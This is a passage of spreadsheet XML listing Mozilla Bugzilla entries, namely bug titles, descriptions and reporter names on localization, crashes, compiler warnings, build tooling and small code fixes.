  <si>
    <t>mozilla.com: tag Thunderbird 2.0.0.6 (l10n) folders for production</t>
  </si>
  <si>
    <t>Please tag the following inproduct pages for production for the Thunderbird 2.0.0.6 release:
Execute: Commit
Added: be/thunderbird/2.0.0.6
Added: be/thunderbird/2.0.0.6/start
Added: be/thunderbird/2.0.0.6/start/index.html
Added: be/thunderbird/2.0.0.6/start/thunderbird_startpage.png
Added: bg/thunderbird/2.0.0.6
Added: bg/thunderbird/2.0.0.6/start
Added: bg/thunderbird/2.0.0.6/start/index.html
Added: bg/thunderbird/2.0.0.6/start/thunderbird_startpage.png
Added: ca/thunderbird/2.0.0.6
Added: ca/thunderbird/2.0.0.6/start
Added: ca/thunderbird/2.0.0.6/start/index.html
Added: ca/thunderbird/2.0.0.6/start/thunderbird_startpage.png
Added: cs/thunderbird/2.0.0.6
Added: cs/thunderbird/2.0.0.6/start
Added: cs/thunderbird/2.0.0.6/start/index.html
Added: cs/thunderbird/2.0.0.6/start/thunderbird_startpage.png
Added: da/thunderbird/2.0.0.6
Added: da/thunderbird/2.0.0.6/start
Added: da/thunderbird/2.0.0.6/start/index.html
Added: da/thunderbird/2.0.0.6/start/thunderbird_startpage.png
Added: de/thunderbird/2.0.0.6
Added: de/thunderbird/2.0.0.6/start
Added: de/thunderbird/2.0.0.6/start/index.html
Added: de/thunderbird/2.0.0.6/start/thunderbird_startpage.png
Added: el/thunderbird/2.0.0.6
Added: el/thunderbird/2.0.0.6/start
Added: el/thunderbird/2.0.0.6/start/index.html
Added: el/thunderbird/2.0.0.6/start/thunderbird_startpage.png
Added: en-GB/thunderbird/2.0.0.6
Added: en-GB/thunderbird/2.0.0.6/start
Added: en-GB/thunderbird/2.0.0.6/start/index.html
Added: en-GB/thunderbird/2.0.0.6/start/thunderbird_startpage.png
Added: es-AR/thunderbird/2.0.0.6
Added: es-AR/thunderbird/2.0.0.6/start
Added: es-AR/thunderbird/2.0.0.6/start/index.html
Added: es-AR/thunderbird/2.0.0.6/start/thunderbird_startpage.png
Added: es-ES/thunderbird/2.0.0.6
Added: es-ES/thunderbird/2.0.0.6/start
Added: es-ES/thunderbird/2.0.0.6/start/index.html
Added: es-ES/thunderbird/2.0.0.6/start/thunderbird_startpage.png
Added: eu/thunderbird/2.0.0.6
Added: eu/thunderbird/2.0.0.6/start
Added: eu/thunderbird/2.0.0.6/start/index.html
Added: eu/thunderbird/2.0.0.6/start/thunderbird_startpage.png
Added: fi/thunderbird/2.0.0.6
Added: fi/thunderbird/2.0.0.6/start
Added: fi/thunderbird/2.0.0.6/start/index.html
Added: fi/thunderbird/2.0.0.6/start/thunderbird_startpage.png
Added: fr/thunderbird/2.0.0.6
Added: fr/thunderbird/2.0.0.6/start
Added: fr/thunderbird/2.0.0.6/start/index.html
Added: fr/thunderbird/2.0.0.6/start/thunderbird_startpage.png
Added: ga-IE/thunderbird/2.0.0.6
Added: ga-IE/thunderbird/2.0.0.6/start
Added: ga-IE/thunderbird/2.0.0.6/start/index.html
Added: ga-IE/thunderbird/2.0.0.6/start/thunderbird_startpage.png
Added: hu/thunderbird/2.0.0.6
Added: hu/thunderbird/2.0.0.6/start
Added: hu/thunderbird/2.0.0.6/start/index.html
Added: hu/thunderbird/2.0.0.6/start/thunderbird_startpage.png
Added: it/thunderbird/2.0.0.6
Added: it/thunderbird/2.0.0.6/start
Added: it/thunderbird/2.0.0.6/start/index.html
Added: it/thunderbird/2.0.0.6/start/thunderbird_startpage.png
Added: ja/thunderbird/2.0.0.6
Added: ja/thunderbird/2.0.0.6/releasenotes
Added: ja/thunderbird/2.0.0.6/releasenotes/index.html
Added: ja/thunderbird/2.0.0.6/start
Added: ja/thunderbird/2.0.0.6/start/index.html
Added: ja/thunderbird/2.0.0.6/start/thunderbird_startpage.png
Added: ko/thunderbird/2.0.0.6
Added: ko/thunderbird/2.0.0.6/start
Added: ko/thunderbird/2.0.0.6/start/index.html
Added: ko/thunderbird/2.0.0.6/start/thunderbird_startpage.png
Added: lt/thunderbird/2.0.0.6
Added: lt/thunderbird/2.0.0.6/start
Added: lt/thunderbird/2.0.0.6/start/index.html
Added: lt/thunderbird/2.0.0.6/start/thunderbird_startpage.png
Added: mk/thunderbird/2.0.0.6
Added: mk/thunderbird/2.0.0.6/start
Added: mk/thunderbird/2.0.0.6/start/index.html
Added: mk/thunderbird/2.0.0.6/start/thunderbird_startpage.png
Added: nb-NO/thunderbird/2.0.0.6
Added: nb-NO/thunderbird/2.0.0.6/start
Added: nb-NO/thunderbird/2.0.0.6/start/index.html
Added: nb-NO/thunderbird/2.0.0.6/start/thunderbird_startpage.png
Added: nl/thunderbird/2.0.0.6
Added: nl/thunderbird/2.0.0.6/start
Added: nl/thunderbird/2.0.0.6/start/index.html
Added: nl/thunderbird/2.0.0.6/start/thunderbird_startpage.png
Added: nn-NO/thunderbird/2.0.0.6
Added: nn-NO/thunderbird/2.0.0.6/start
Added: nn-NO/thunderbird/2.0.0.6/start/index.html
Added: nn-NO/thunderbird/2.0.0.6/start/thunderbird_startpage.png
Added: pa-IN/thunderbird/2.0.0.6
Added: pa-IN/thunderbird/2.0.0.6/start
Added: pa-IN/thunderbird/2.0.0.6/start/index.html
Added: pa-IN/thunderbird/2.0.0.6/start/thunderbird_startpage.png
Added: pl/thunderbird/2.0.0.6
Added: pl/thunderbird/2.0.0.6/start
Added: pl/thunderbird/2.0.0.6/start/index.html
Added: pl/thunderbird/2.0.0.6/start/thunderbird_startpage.png
Added: pt-BR/thunderbird/2.0.0.6
Added: pt-BR/thunderbird/2.0.0.6/start
Added: pt-BR/thunderbird/2.0.0.6/start/index.html
Added: pt-BR/thunderbird/2.0.0.6/start/thunderbird_startpage.png
Added: pt-PT/thunderbird/2.0.0.6
Added: pt-PT/thunderbird/2.0.0.6/start
Added: pt-PT/thunderbird/2.0.0.6/start/index.html
Added: pt-PT/thunderbird/2.0.0.6/start/thunderbird_startpage.png
Added: ru/thunderbird/2.0.0.6
Added: ru/thunderbird/2.0.0.6/start
Added: ru/thunderbird/2.0.0.6/start/index.html
Added: ru/thunderbird/2.0.0.6/start/thunderbird_startpage.png
Added: sk/thunderbird/2.0.0.6
Added: sk/thunderbird/2.0.0.6/start
Added: sk/thunderbird/2.0.0.6/start/index.html
Added: sk/thunderbird/2.0.0.6/start/thunderbird_startpage.png
Added: sl/thunderbird/2.0.0.6
Added: sl/thunderbird/2.0.0.6/start
Added: sl/thunderbird/2.0.0.6/start/index.html
Added: sl/thunderbird/2.0.0.6/start/thunderbird_startpage.png
Added: sv-SE/thunderbird/2.0.0.6
Added: sv-SE/thunderbird/2.0.0.6/start
Added: sv-SE/thunderbird/2.0.0.6/start/index.html
Added: sv-SE/thunderbird/2.0.0.6/start/thunderbird_startpage.png
Added: tr/thunderbird/2.0.0.6
Added: tr/thunderbird/2.0.0.6/start
Added: tr/thunderbird/2.0.0.6/start/index.html
Added: tr/thunderbird/2.0.0.6/start/thunderbird_startpage.png
Added: zh-CN/thunderbird/2.0.0.6
Added: zh-CN/thunderbird/2.0.0.6/start
Added: zh-CN/thunderbird/2.0.0.6/start/index.html
Added: zh-CN/thunderbird/2.0.0.6/start/thunderbird_startpage.png
Added: zh-TW/thunderbird/2.0.0.6
Added: zh-TW/thunderbird/2.0.0.6/start
Added: zh-TW/thunderbird/2.0.0.6/start/index.html
Added: zh-TW/thunderbird/2.0.0.6/start/thunderbird_startpage.png
Committed revision 5205.
Updating...
Ready</t>
  </si>
  <si>
    <t>WEBSITES-401151</t>
  </si>
  <si>
    <t>Add Damon's Blog</t>
  </si>
  <si>
    <t>Not sure what the process for adding my blog to planet or where ever else it is supposed to go but can you help me add http://mozilla.damon.sicore.org to the list of blogs being aggregated?
Thanks for the help.</t>
  </si>
  <si>
    <t>dsicore</t>
  </si>
  <si>
    <t>FIREFOX-316863</t>
  </si>
  <si>
    <t>Keyword search doesn't quote '+' character</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8) Gecko/20051107 Firefox/1.5
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8) Gecko/20051107 Firefox/1.5
A keyword search that contains the '+' character leaves it as-is instead of quoting it as %2B.  This results in CGI scripts processing it as space.
Reproducible: Always
Steps to Reproduce:
1. Create a keyword search for example by using add a keyword for this search context menu item.  In my example I created a shortcut g for google searches.
2. Use the keyword with a string that contains '+'.  For exampe type g c++ (without quotes) in the location bar.
3. Observe a the search for c   instead of for c++ is launched.
Actual Results:  
c++ sent as-is which google (and other servers) interprets as c  .
Expected Results:  
c++ encoded as c%2B%2B which google interprets as c++.
This worked correctly in Firefox 1.0.</t>
  </si>
  <si>
    <t>hniksic</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-746004</t>
  </si>
  <si>
    <t>Need a reasonable way to trigger builds with clang on Try</t>
  </si>
  <si>
    <t>Current we can't seem to be able to push to try server and have a build done with clang. But yet we get people comlaining of breakage with clang.
We need to have a build option to build with clang.</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-288433</t>
  </si>
  <si>
    <t>Rhino project: changing default bug owner</t>
  </si>
  <si>
    <t>Currently I am listed as a default owner for new bugs for Rhino product. Since
it does not look like I would contribute to the project in future having my
email as bug owner is equivalent to /dev/null.</t>
  </si>
  <si>
    <t>TOOLKIT-394466</t>
  </si>
  <si>
    <t>Call XCloseDisplay before exit and exec</t>
  </si>
  <si>
    <t>Shutting down the display properly frees associated allocated memory from Xlib and also from libraries (such as Xft and cairo) that register clean up routines with XESetCloseDisplay.  This makes real leaks easier to separate from the noise.
This may also help with bug 246313 where an exec without XCloseDisplay causes the Xserver to believe that second cient is wanting to use the same XDM authorization key before the first has finished.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-681851</t>
  </si>
  <si>
    <t>Clean up the locale lookup</t>
  </si>
  <si>
    <t>es is lower-casing all the locale names so some aren't found (en-us). Then there's a ton of unknown names that could be hidden or found in product-details.</t>
  </si>
  <si>
    <t>CORE-268264</t>
  </si>
  <si>
    <t>nsISSLSocketControl interface not scriptable</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X en) AppleWebKit/125.5.5 (KHTML like Gecko) Safari/125.11
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
I am developing an extension for firefox that I'd like to have the ability to add ssl to an already open 
socket (via starttls).  The nsISSLSocketControl provides such an interface but it is not scriptable.  I've 
changed the 'noscript' keywords in the nsISSLSocketControl.idl and nsISSLSocketProvider.idl to 
'scriptable' and my application works negotiating the tls just fine even prompting me for the usual 
self-signed certificate warnings.
I was wondering if it's possible to get this small change put into firefox before the 1.0 release.  I'm not 
sure that this is the correct channel to ask on so please let me know if I should ask somewhere else.
Here's the diffs for what I changed to make it work for me:
[petesmactop:netwerk/socket/base] pete% cvs diff
cvs diff: Diffing .
Index: nsISSLSocketControl.idl
===============================================================
====
RCS file: /cvsroot/mozilla/netwerk/socket/base/nsISSLSocketControl.idlv
retrieving revision 1.5
diff -r1.5 nsISSLSocketControl.idl
29c29
&lt; [noscript uuid(8b3e8488-1dd2-11b2-b547-956290be347c)]
---
&gt; [scriptable uuid(8b3e8488-1dd2-11b2-b547-956290be347c)]
Index: nsISSLSocketProvider.idl
===============================================================
====
RCS file: /cvsroot/mozilla/netwerk/socket/base/nsISSLSocketProvider.idlv
retrieving revision 1.4
diff -r1.4 nsISSLSocketProvider.idl
27c27
&lt; [noscript uuid(856a93d0-5415-11d3-bbc8-0000861d1237)]
---
&gt; [scriptable uuid(856a93d0-5415-11d3-bbc8-0000861d1237)]
Thanks
-Pete
Reproducible: Always
Steps to Reproduce:
this._transport = this._sockService.createTransport([starttls] 1 host port null)
var si = this._transport.securityInfo
si.QueryInterface(Components.interfaces.nsISSLSocketControl)
si.StartTLS()
Actual Results:  
An exception happened at the QueryInterface call because Components.interfaces.nsISSLSocketControl 
was null.
Expected Results:  
Add the nsISSLSocketControl interface.</t>
  </si>
  <si>
    <t>CORE-480226</t>
  </si>
  <si>
    <t>Fix warnings in security/manager/ssl/src</t>
  </si>
  <si>
    <t>Created attachment 364214
Fix
[Checkin: Comment 2]
I noticed a few warnings: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258: warning: deprecated conversion from string constant to â€˜char*â€™
/home/mrbkap/work/main/mozilla/security/manager/ssl/src/nsKeygenHandler.cpp: In member function â€˜nsresult nsKeygenFormProcessor::GetPublicKey(nsAString_internal&amp; nsAString_internal&amp; nsAFlatString&amp; nsAString_internal&amp; nsAString_internal&amp;)â€™:
/home/mrbkap/work/main/mozilla/security/manager/ssl/src/nsKeygenHandler.cpp:636: warning: deprecated conversion from string constant to â€˜char*â€™
/home/mrbkap/work/main/mozilla/security/manager/ssl/src/nsKeygenHandler.cpp:640: warning: deprecated conversion from string constant to â€˜char*â€™
/home/mrbkap/work/main/mozilla/security/manager/ssl/src/nsCrypto.cpp: In function â€˜void* nsConvertToActualKeyGenParams(PRUint32 char* PRUint32 PRInt32 nsKeyPairInfo*)â€™:
/home/mrbkap/work/main/mozilla/security/manager/ssl/src/nsCrypto.cpp:593: warning: deprecated conversion from string constant to â€˜char*â€™
/home/mrbkap/work/main/mozilla/security/manager/ssl/src/nsCrypto.cpp:597: warning: deprecated conversion from string constant to â€˜char*â€™
/home/mrbkap/work/main/mozilla/security/manager/ssl/src/nsCrypto.cpp: In member function â€˜virtual nsresult nsCrypto::ImportUserCertificates(const nsAString_internal&amp; const nsAString_internal&amp; PRBool nsAString_internal&amp;)â€™:
/home/mrbkap/work/main/mozilla/security/manager/ssl/src/nsCrypto.cpp:2385: warning: deprecated conversion from string constant to â€˜char*â€™</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-443627</t>
  </si>
  <si>
    <t>fa / Persian</t>
  </si>
  <si>
    <t>[fa] Firefox 3 Web parts for Persian</t>
  </si>
  <si>
    <t>New locales need to have in-product pages used by Firefox listed here: 
http://l10n.mozilla.org/webdashboard/?project=0&amp;task=Firefox+3+in-product+pages
Since web pages are a moving target with content and markup changing over time
Pascal will follow up here with the status quo on that.</t>
  </si>
  <si>
    <t>CORE-816856</t>
  </si>
  <si>
    <t>Embedded object accessibles for inaccessible/windowless plugins should not expose a NULL child</t>
  </si>
  <si>
    <t>Str:
1. Visit a page with a windowless plugin e.g. http://www.brandonsanderson.com/
2. Locate the accessible for the embedded object.
3. Call IAccessible::accChildCount on this accessible.
Expected: 0.
Actual: 1.
4. Call AccessibleChidlren passing iChildStart as 0 and cChildren as the child count (step 3).
Expected: The returned array should be empty (no children).
Actual: An array of length 1 is returned. The array member is a VARIANT with VT_DISPATCH but a pDispVal of NULL.
A NULL child should never be returned by AccessibleChildren.
This doesn't affect users of NVDA (or probably any other AT) but it's probably worth fixing for correctness and automation.</t>
  </si>
  <si>
    <t>jteh</t>
  </si>
  <si>
    <t>SEAMONKEY-238166</t>
  </si>
  <si>
    <t>Wording for obsolete themes warning now incorrect</t>
  </si>
  <si>
    <t>After the fix for bug 180364 which changed the uninstall button from Uninstall
%theme_name% to Uninstall Theme the wording for the warning that comes up when
you try to select an obsolete theme should be changed:
Currently it's:
You have selected a theme which was designed for an earlier version of %brand%
and is incompatible with your current %brand% version. Please check %brand%
theme sites for an updated version of the theme. You can uninstall this theme by
clicking Uninstall %theme_name% button.
where %brand% is usually Mozilla and %theme_name% is the name of the selected theme.
As the button is now simply Uninstall Theme this should read:
You have selected a theme which was designed for an earlier version of %brand%
and is incompatible with your current %brand% version. Please check %brand%
theme sites for an updated version of the theme. You can uninstall this theme by
clicking Uninstall Theme button.
Simple patch attached.</t>
  </si>
  <si>
    <t>dave532</t>
  </si>
  <si>
    <t>CORE-401097</t>
  </si>
  <si>
    <t>Firefox crashes [@ js_MarkGCThing] at startup</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.1.9pre) Gecko/20071025 BonEcho/2.0.0.9pre
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.1.9pre) Gecko/20071025 BonEcho/2.0.0.9pre
I have about 32 windows with 246 tabs open in my profile.
Reproducible: Sometimes
Steps to Reproduce:
1.Try to restore a massive session
2.Sometimes firefox just crash.
Actual Results:  
Sometimes firefox crashes.
Expected Results:  
Session restoration
FF was working fine until build 2007090703. Versions since 2007090703 crashes most of the time at startup (restoring my massive session). I use a lot of extensions but I can confirm that going back to that FF build worked fine.
If I disable extensions FF still crashes but less often.</t>
  </si>
  <si>
    <t>jcea</t>
  </si>
  <si>
    <t>THUNDERBIRD-345096</t>
  </si>
  <si>
    <t>Address book is misspelled</t>
  </si>
  <si>
    <t>/mail/locales/en-US/chrome/messenger/migration/migration.dtd line 4 -- 
/mail/locales/en-US/chrome/messenger/migration/migration.dtd line 5 -- 
These are the only two places in the entire tree that managed to do this.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-270771</t>
  </si>
  <si>
    <t>crash inspecting content of IFRAME [@ inLayoutUtils::GetFrameFor ]</t>
  </si>
  <si>
    <t>2004111805/Seamonkey-trunk/W2K
Repro:
1. open http://dir.seznam.cz/42/03/35.html with DOMI in sidebar
2. inspect tree until you find IFRAME expand it
Actual:
When you'll expand HEAD or BODY of IFRAME browser will crash (TB2049309M
TB2048338M)
TB2049309:
inLayoutUtils::GetFrameFor 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/extensions/inspector/base/src/inLayoutUtils.cpp
line 100]
inFlasher::ScrollElementIntoView 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/extensions/inspector/base/src/inFlasher.cpp
line 215]
XPTC_InvokeByIndex 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/xpcom/reflect/xptcall/src/md/win32/xptcinvoke.cpp
line 102]
XPCWrappedNative::CallMethod 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/js/src/xpconnect/src/xpcwrappednative.cpp
line 2036]
XPC_WN_CallMethod 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/js/src/xpconnect/src/xpcwrappednativejsops.cpp
line 1288]
js_Invoke 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/js/src/jsinterp.c
line 1288]
js_Interpret 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/js/src/jsinterp.c
line 3621]
js_Invoke 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/js/src/jsinterp.c
line 1307]
js_InternalInvoke 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/js/src/jsinterp.c
line 1384]
js_InternalGetOrSet 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/js/src/jsinterp.c
line 1427]
js_SetProperty 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/js/src/jsobj.c line
2788]
js_Interpret 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/js/src/jsinterp.c
line 2659]
js_Invoke 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/js/src/jsinterp.c
line 1307]
js_InternalInvoke 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/js/src/jsinterp.c
line 1384]
JS_CallFunctionValue 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/js/src/jsapi.c line
3769]
nsJSContext::CallEventHandler 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/dom/src/base/nsJSEnvironment.cpp
line 1346]
nsJSEventListener::HandleEvent 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/dom/src/events/nsJSEventListener.cpp
line 181]
nsEventListenerManager::HandleEventSubType 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/content/events/src/nsEventListenerManager.cpp
line 1513]
nsEventListenerManager::HandleEvent 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/content/events/src/nsEventListenerManager.cpp
line 1589]
nsXULElement::HandleDOMEvent 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/content/xul/content/src/nsXULElement.cpp
line 2820]
nsTreeSelection::FireOnSelectHandler 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/xul/base/src/tree/src/nsTreeSelection.cpp
line 760]
nsTreeSelection::Select 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/xul/base/src/tree/src/nsTreeSelection.cpp
line 377]
XPTC_InvokeByIndex 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/xpcom/reflect/xptcall/src/md/win32/xptcinvoke.cpp
line 102]
XPCWrappedNative::CallMethod 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/js/src/xpconnect/src/xpcwrappednative.cpp
line 2036]
XPC_WN_CallMethod 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/js/src/xpconnect/src/xpcwrappednativejsops.cpp
line 1288]
js_Invoke 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/js/src/jsinterp.c
line 1288]
js_Interpret 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/js/src/jsinterp.c
line 3621]
js_Invoke 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/js/src/jsinterp.c
line 1307]
js_InternalInvoke 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/js/src/jsinterp.c
line 1384]
JS_CallFunctionValue 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/js/src/jsapi.c line
3769]
nsJSContext::CallEventHandler 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/dom/src/base/nsJSEnvironment.cpp
line 1346]
nsJSEventListener::HandleEvent 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/dom/src/events/nsJSEventListener.cpp
line 181]
nsXBLPrototypeHandler::ExecuteHandler 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/content/xbl/src/nsXBLPrototypeHandler.cpp
line 491]
nsXBLEventHandler::HandleEvent 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/content/xbl/src/nsXBLEventHandler.cpp
line 85]
nsEventListenerManager::HandleEventSubType 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/content/events/src/nsEventListenerManager.cpp
line 1513]
nsEventListenerManager::HandleEvent 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/content/events/src/nsEventListenerManager.cpp
line 1589]
nsXULElement::HandleDOMEvent 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/content/xul/content/src/nsXULElement.cpp
line 2820]
PresShell::HandleEventInternal 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsPresShell.cpp
line 5961]
PresShell::HandleEvent 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/html/base/src/nsPresShell.cpp
line 5846]
nsViewManager::HandleEvent 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/view/src/nsViewManager.cpp
line 2404]
nsViewManager::DispatchEvent 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/view/src/nsViewManager.cpp
line 2133]
HandleEvent 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/view/src/nsView.cpp
line 166]
nsWindow::DispatchEvent 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/widget/src/windows/nsWindow.cpp
line 1078]
nsWindow::DispatchWindowEvent 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/widget/src/windows/nsWindow.cpp
line 1095]
nsWindow::DispatchMouseEvent 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/widget/src/windows/nsWindow.cpp
line 5329]
ChildWindow::DispatchMouseEvent 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/widget/src/windows/nsWindow.cpp
line 5581]
nsWindow::ProcessMessage 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/widget/src/windows/nsWindow.cpp
line 4091]
nsWindow::WindowProc 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/widget/src/windows/nsWindow.cpp
line 1356]
USER32.dll + 0x1ef0 (0x77e11ef0)
USER32.dll + 0x204c (0x77e1204c)
USER32.dll + 0x21af (0x77e121af)
nsAppStartup::Run 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/xpfe/components/startup/src/nsAppStartup.cpp
line 216]
main1 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/xpfe/bootstrap/nsAppRunner.cpp
line 1331]
main 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/xpfe/bootstrap/nsAppRunner.cpp
line 1802]
WinMain 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/xpfe/bootstrap/nsAppRunner.cpp
line 1828]
WinMainCRTStartup()
KERNEL32.DLL + 0x2893d (0x796f893d)
M 1.7.2 doesn't crash on repro.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-801718</t>
  </si>
  <si>
    <t>mEnv_ErrorCode in morkEnv should be an mdb_err</t>
  </si>
  <si>
    <t>mEnv_ErrorCode is basically an mdb_err (nsresult) and so we could just change its type and drop some of the casting that we currently need to do.</t>
  </si>
  <si>
    <t>cykesiopka.bmo</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-493740</t>
  </si>
  <si>
    <t>Fix the harmless exception -&gt; 'NoneType' object has no attribute 'allSchedulers'</t>
  </si>
  <si>
    <t>When I reconfigure my local setup which is a checkout of staging's config throws this exception which does not seem to have a harmful effect.
Is anyone else seeing it?
##############
2009-05-13 07:38:35-0700 [HTTPPageGetterclient] Starting factory
&lt;HTTPClientFactory: http://hg.mozilla.org/mozilla-ce2009-05-13 07:38:34-0700
[-] notifying downstream schedulers of changes
2009-05-13 07:38:34-0700 [-] Unhandled error in Deferred:
2009-05-13 07:38:34-0700 [-] Unhandled Error
        Traceback (most recent call last):
          File
/tools/buildbot/lib/python2.5/site-packages/buildbot-0.7.10p1-py2.5.egg/buildbot/master.py
line 759 in 
            d.addCallback(lambda res: self.loadConfig_Schedulers(schedulers))
          File
/tools/buildbot/lib/python2.5/site-packages/buildbot-0.7.10p1-py2.5.egg/buildbot/master.py
line 835 in loadConfig_Schedulers
            d.addCallback(updateDownstreams)
          File
/tools/twisted-8.0.1/lib/python2.5/site-packages/twisted/internet/defer.py
line 194 in addCallback
            callbackKeywords=kw)
          File
/tools/twisted-8.0.1/lib/python2.5/site-packages/twisted/internet/defer.py
line 185 in addCallbacks
            self._runCallbacks()
        ---  ---
          File
/tools/twisted-8.0.1/lib/python2.5/site-packages/twisted/internet/defer.py
line 323 in _runCallbacks
            self.result = callback(self.result *args **kw)
          File
/tools/buildbot/lib/python2.5/site-packages/buildbot-0.7.10p1-py2.5.egg/buildbot/master.py
line 834 in updateDownstreams
            s.checkUpstreamScheduler()
          File
/tools/buildbot/lib/python2.5/site-packages/buildbot-0.7.10p1-py2.5.egg/buildbot/scheduler.py
line 350 in checkUpstreamScheduler
            for s in self.parent.allSchedulers():
        exceptions.AttributeError: 'NoneType' object has no attribute
'allSchedulers'
2009-05-13 07:38:34-0700 [HTTPPageGetterclient] onLoadConfig called
#################</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-406198</t>
  </si>
  <si>
    <t>Correct some enumerator instance usages in mailnews to NewEmptyEnumerator and move some away from nsISupportsArray</t>
  </si>
  <si>
    <t>Created attachment 290898
The fix
There's a few places in mailnews that we create an array and then use NS_NewArrayEnumerator to return an nsISimpleEnumerator. Given we have NS_NewEmptyEnumerator we should be using that.
I've also included a few bits of simpler tidy up that drop the obsolete nsISupportsArray and use nsI(Mutable)Array instead picking up the appropriate enumerator at the same time.</t>
  </si>
  <si>
    <t>CORE-400265</t>
  </si>
  <si>
    <t>trunk uses wrong (unwanted) rendering engine for fonts</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-GB rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-GB rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7
I have just downloaded latest version of manfield and noticed that it uses different rendering engine for font rendering which actually makes fonts look ugly and difficult to read (see attachments). 
Reproducible: Always
Steps to Reproduce:
1. Run Manfield
2. Open i.e. http://www.mozilla.org/projects/minefield/
3. It affects all pages every time.
Actual Results:  
Fonts are rendered incorrectly doesn't look consistent with GNOME.
Expected Results:  
Consistent font rendering - if I like mac os style of font rendering I would like to see Firefox using it too. Version 2.0.0.7 works fine but newest Manfield doesn't. 
more information about font rasterization: http://antigrain.com/research/font_rasterization/index.html</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-376762</t>
  </si>
  <si>
    <t>ku / Kurdish</t>
  </si>
  <si>
